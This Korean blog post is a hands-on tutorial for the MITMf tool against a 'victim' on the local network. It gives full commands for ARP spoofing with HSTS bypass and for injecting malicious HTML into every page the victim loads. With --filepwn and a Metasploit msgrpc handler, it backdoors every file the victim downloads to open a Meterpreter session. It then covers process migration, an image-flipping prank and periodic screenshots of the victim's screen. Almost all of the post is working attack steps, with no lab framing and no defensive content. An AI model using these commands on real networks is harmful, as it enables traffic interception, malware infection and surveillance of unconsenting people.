본문 바로가기
3. 웹 애플리케이션 취약점 진단

MITMF를 이용해서 웹사이트 해킹하기 & 다운로드 하는 파일에 자동 바이러스 주입 [보너스:웹사이트 이미지 거꾸로 만들기]

by Robert8478 2023. 12. 27.

1.다른 웹사이트 자체를 해킹한다기 보다는 MITMF 공격에 악성코드를 넣은 index.html을 주입시킴으로써
해당 피해자가 해커의 사이트에 진입하여 감염 된 후 어느 사이트를 들어가던 해당 악성 index.html 화면이 아래에 보이게 됩니다.

service apache2 start 로 apache 서버를 실행시켜 준 뒤

# mitmf --spoof --arp --hsts -i eth0 --gateway 게이트웨이 주소 --target 피해자 컴퓨터 아이피주소 --inject --html-file /ver/www/html/index.html

해당 명령어를 사용해 주면 됩니다.

2.감염된 피해자가 인터넷에서 무언가를 다운로드 받을때 해당 다운로드 파일에 mitmf가 자동으로 악성코드를 주입하여 다운로드 받게 되어 감염시킬수 있도록 하는 기능입니다.

service postgresql start 로 db를 실행시켜 주시고

msfconsole로 들어가서 load msgrpc 를 들어가면 username과 password가 나옵니다.

mitmf 폴더로 들어가서 mitmf.conf 파일을 leafpad 등으로 열어주시고 Metasploit 부분의 rpcpass 부분의 비밀번호를 mitmf.conf의 password로 변경해 줍니다.

msfconsole -r handler.rc 로 핸들러를 실행시켜 주신 뒤

mitmf --spoof --arp --hsts -i eth0 --gateway 게이트웨이 주소 --target 피해자 컴퓨터 아이피주소 --filepwn 를 입력해 줍니다.

그러면 감염이 성공적으로 이루어지며 피해자 컴퓨터에서 아무 파일을 받아서 실행시켜주면 감염이 되어 msfconsole 핸들러에 잡히게 됩니다.


--- migrate [프로세스 아이디] 명령어를 이용해서 해당 프로그램으로 핸들링이 되는 것을 다른 프로세스로 옮길 수 있습니다. ex) migrate 1140



feat. 위 mitmf 명령어 뒤에 --upsidedownternet을 쳐주면 피해자의 웹사이트 이미지들이 모두 거꾸로 나오게 되는 장난을 칠수 있습니다!

ex)mitmf --spoof --arp --hsts -i eth0 --gateway 게이트웨이 주소 --target 피해자 컴퓨터 아이피주소 --upsidedownternet

+ 뒤에 --screen --interval 5 를 같이 넣어주면 5초마다 스크린샷을 찍어서 mitmf 폴더안의 logs 폴더 안에 저장하게됩니다!